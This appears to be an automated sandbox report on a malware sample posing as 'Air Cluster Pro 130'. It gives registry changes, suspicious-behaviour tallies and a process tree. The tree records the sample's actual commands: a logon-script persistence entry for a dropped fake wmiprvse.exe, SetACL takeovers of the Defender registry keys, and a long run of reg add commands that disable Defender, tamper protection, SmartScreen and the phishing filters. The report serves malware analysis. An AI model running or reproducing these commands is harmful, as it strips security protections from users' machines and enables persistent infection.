MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e66ac78dbfb2d901 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000dff34c8e27ffa3a149b972a8d0f6faab57fa348acbbbfe6264136ab490383e4a07452f52acab0367b7d3bfc7af2e3940921e30ca88a092da7e8a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.msn.com MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = bb47bf9fbfb2d901 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4220 Air Cluster Pro 130.tmp 4220 Air Cluster Pro 130.tmp 1036 s0.tmp 1036 s0.tmp 3100 PowerRun.exe 3100 PowerRun.exe 3100 PowerRun.exe 3100 PowerRun.exe 1108 Conhost.exe 1108 Conhost.exe 1108 Conhost.exe 1108 Conhost.exe 2084 reg.exe 2084 reg.exe 2084 reg.exe 2084 reg.exe 4816 reg.exe 4816 reg.exe 4816 reg.exe 4816 reg.exe 4400 reg.exe 4400 reg.exe 4400 reg.exe 4400 reg.exe 5064 reg.exe 5064 reg.exe 5064 reg.exe 5064 reg.exe 4552 reg.exe 4552 reg.exe 756 PowerRun.exe 756 PowerRun.exe 4552 reg.exe 4552 reg.exe 756 PowerRun.exe 756 PowerRun.exe 4208 reg.exe 4208 reg.exe 4208 reg.exe 4208 reg.exe 4532 bsetgaf.exe 4532 bsetgaf.exe 4532 bsetgaf.exe 4532 bsetgaf.exe 1864 reg.exe 1864 reg.exe 1640 PowerRun.exe 1640 PowerRun.exe 1864 reg.exe 1864 reg.exe 1640 PowerRun.exe 1640 PowerRun.exe 5060 reg.exe 5060 reg.exe 5060 reg.exe 5060 reg.exe 4532 bsetgaf.exe 4532 bsetgaf.exe 4532 bsetgaf.exe 4532 bsetgaf.exe 3144 reg.exe 3144 reg.exe 3144 reg.exe 3144 reg.exe -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 2628 wmiprvse.exe Token: SeDebugPrivilege 1612 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1612 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1612 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1612 MicrosoftEdgeCP.exe Token: SeBackupPrivilege 3228 SetACL32.exe Token: SeRestorePrivilege 3228 SetACL32.exe Token: SeTakeOwnershipPrivilege 3228 SetACL32.exe Token: SeBackupPrivilege 5088 svchost.exe Token: SeRestorePrivilege 5088 svchost.exe Token: SeTakeOwnershipPrivilege 5088 svchost.exe Token: SeBackupPrivilege 3100 PowerRun.exe Token: SeRestorePrivilege 3100 PowerRun.exe Token: SeTakeOwnershipPrivilege 3100 PowerRun.exe Token: SeBackupPrivilege 1104 SetACL32.exe Token: SeRestorePrivilege 1104 SetACL32.exe Token: SeTakeOwnershipPrivilege 1104 SetACL32.exe Token: SeBackupPrivilege 1420 Conhost.exe Token: SeRestorePrivilege 1420 Conhost.exe Token: SeTakeOwnershipPrivilege 1420 Conhost.exe Token: SeBackupPrivilege 3052 reg.exe Token: SeRestorePrivilege 3052 reg.exe Token: SeTakeOwnershipPrivilege 3052 reg.exe Token: SeBackupPrivilege 2932 SetACL32.exe Token: SeRestorePrivilege 2932 SetACL32.exe Token: SeTakeOwnershipPrivilege 2932 SetACL32.exe Token: SeBackupPrivilege 2700 reg.exe Token: SeRestorePrivilege 2700 reg.exe Token: SeTakeOwnershipPrivilege 2700 reg.exe Token: SeDebugPrivilege 3100 PowerRun.exe Token: SeAssignPrimaryTokenPrivilege 3100 PowerRun.exe Token: SeIncreaseQuotaPrivilege 3100 PowerRun.exe Token: 0 3100 PowerRun.exe Token: SeDebugPrivilege 4920 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4920 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1108 Conhost.exe Token: SeAssignPrimaryTokenPrivilege 1108 Conhost.exe Token: SeIncreaseQuotaPrivilege 1108 Conhost.exe Token: 0 1108 Conhost.exe Token: SeDebugPrivilege 2084 reg.exe Token: SeAssignPrimaryTokenPrivilege 2084 reg.exe Token: SeIncreaseQuotaPrivilege 2084 reg.exe Token: SeDebugPrivilege 3144 reg.exe Token: SeAssignPrimaryTokenPrivilege 3144 reg.exe Token: SeIncreaseQuotaPrivilege 3144 reg.exe Token: SeDebugPrivilege 4816 reg.exe Token: SeAssignPrimaryTokenPrivilege 4816 reg.exe Token: SeIncreaseQuotaPrivilege 4816 reg.exe Token: 0 4816 reg.exe Token: SeDebugPrivilege 4400 reg.exe Token: SeAssignPrimaryTokenPrivilege 4400 reg.exe Token: SeIncreaseQuotaPrivilege 4400 reg.exe Token: SeDebugPrivilege 5064 reg.exe Token: SeAssignPrimaryTokenPrivilege 5064 reg.exe Token: SeIncreaseQuotaPrivilege 5064 reg.exe Token: 0 5064 reg.exe Token: SeDebugPrivilege 4552 reg.exe Token: SeAssignPrimaryTokenPrivilege 4552 reg.exe Token: SeIncreaseQuotaPrivilege 4552 reg.exe Token: SeDebugPrivilege 756 PowerRun.exe Token: SeAssignPrimaryTokenPrivilege 756 PowerRun.exe Token: SeIncreaseQuotaPrivilege 756 PowerRun.exe Token: 0 756 PowerRun.exe Token: SeDebugPrivilege 4208 reg.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4220 Air Cluster Pro 130.tmp 1036 s0.tmp 2628 wmiprvse.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3580 MicrosoftEdge.exe 812 MicrosoftEdgeCP.exe 1612 MicrosoftEdgeCP.exe 812 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4624 wrote to memory of 4220 4624 Air Cluster Pro 130.exe 70 PID 4624 wrote to memory of 4220 4624 Air Cluster Pro 130.exe 70 PID 4624 wrote to memory of 4220 4624 Air Cluster Pro 130.exe 70 PID 4220 wrote to memory of 4372 4220 Air Cluster Pro 130.tmp 71 PID 4220 wrote to memory of 4372 4220 Air Cluster Pro 130.tmp 71 PID 4220 wrote to memory of 4372 4220 Air Cluster Pro 130.tmp 71 PID 4372 wrote to memory of 4204 4372 setup.exe 72 PID 4372 wrote to memory of 4204 4372 setup.exe 72 PID 4372 wrote to memory of 4204 4372 setup.exe 72 PID 4204 wrote to memory of 4192 4204 setup.tmp 73 PID 4204 wrote to memory of 4192 4204 setup.tmp 73 PID 4204 wrote to memory of 4192 4204 setup.tmp 73 PID 4192 wrote to memory of 1036 4192 s0.exe 74 PID 4192 wrote to memory of 1036 4192 s0.exe 74 PID 4192 wrote to memory of 1036 4192 s0.exe 74 PID 1036 wrote to memory of 204 1036 s0.tmp 75 PID 1036 wrote to memory of 204 1036 s0.tmp 75 PID 1036 wrote to memory of 204 1036 s0.tmp 75 PID 204 wrote to memory of 3840 204 cmd.exe 77 PID 204 wrote to memory of 3840 204 cmd.exe 77 PID 204 wrote to memory of 3840 204 cmd.exe 77 PID 1036 wrote to memory of 4536 1036 s0.tmp 78 PID 1036 wrote to memory of 4536 1036 s0.tmp 78 PID 1036 wrote to memory of 4536 1036 s0.tmp 78 PID 4536 wrote to memory of 4816 4536 cmd.exe 80 PID 4536 wrote to memory of 4816 4536 cmd.exe 80 PID 4536 wrote to memory of 4816 4536 cmd.exe 80 PID 1036 wrote to memory of 2628 1036 s0.tmp 81 PID 1036 wrote to memory of 2628 1036 s0.tmp 81 PID 1036 wrote to memory of 2628 1036 s0.tmp 81 PID 1036 wrote to memory of 3688 1036 s0.tmp 82 PID 1036 wrote to memory of 3688 1036 s0.tmp 82 PID 1036 wrote to memory of 3688 1036 s0.tmp 82 PID 812 wrote to memory of 1612 812 MicrosoftEdgeCP.exe 88 PID 812 wrote to memory of 1612 812 MicrosoftEdgeCP.exe 88 PID 812 wrote to memory of 1612 812 MicrosoftEdgeCP.exe 88 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 4204 wrote to memory of 204 4204 setup.tmp 90 PID 4204 wrote to memory of 204 4204 setup.tmp 90 PID 4204 wrote to memory of 204 4204 setup.tmp 90 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 204 wrote to memory of 4200 204 s1.exe 91 PID 204 wrote to memory of 4200 204 s1.exe 91 PID 204 wrote to memory of 4200 204 s1.exe 91 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 4200 wrote to memory of 3228 4200 cmd.exe 93 PID 4200 wrote to memory of 3228 4200 cmd.exe 93 PID 4200 wrote to memory of 3228 4200 cmd.exe 93 PID 4200 wrote to memory of 5088 4200 cmd.exe 172 PID 4200 wrote to memory of 5088 4200 cmd.exe 172 PID 4200 wrote to memory of 5088 4200 cmd.exe 172 PID 4200 wrote to memory of 3100 4200 cmd.exe 217 PID 4200 wrote to memory of 3100 4200 cmd.exe 217 PID 4200 wrote to memory of 3100 4200 cmd.exe 217 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 812 wrote to memory of 3696 812 MicrosoftEdgeCP.exe 89 PID 4200 wrote to memory of 1104 4200 cmd.exe 96 PID 4200 wrote to memory of 1104 4200 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp"C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp" /SL5="$801C8,833540,832512,C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp" /SL5="$20262,938139,832512,C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe"C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 22175⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp"C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp" /SL5="$202EE,9877208,832512,C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 22176⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\{app}\cvysapfvmvsjevb.cab -F:* %ProgramData%7⤵
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\{app}\cvysapfvmvsjevb.cab -F:* C:\ProgramData8⤵
- Drops file in Windows directory
PID:3840
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /f7⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f8⤵PID:4816
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe"C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2628
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x00^&pb=1^&px=22177⤵
- Checks computer location settings
PID:3688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe"C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe" 9922175⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do32.bat6⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"7⤵PID:3100
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"7⤵PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:2700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f7⤵PID:2252
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f7⤵PID:1356
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f7⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f7⤵PID:4680
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f7⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f7⤵PID:4288
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f7⤵PID:3600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f7⤵PID:3356
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f7⤵PID:2692
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f7⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f7⤵PID:4188
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:2088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f7⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f7⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f7⤵PID:3724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f7⤵PID:3132
-
-
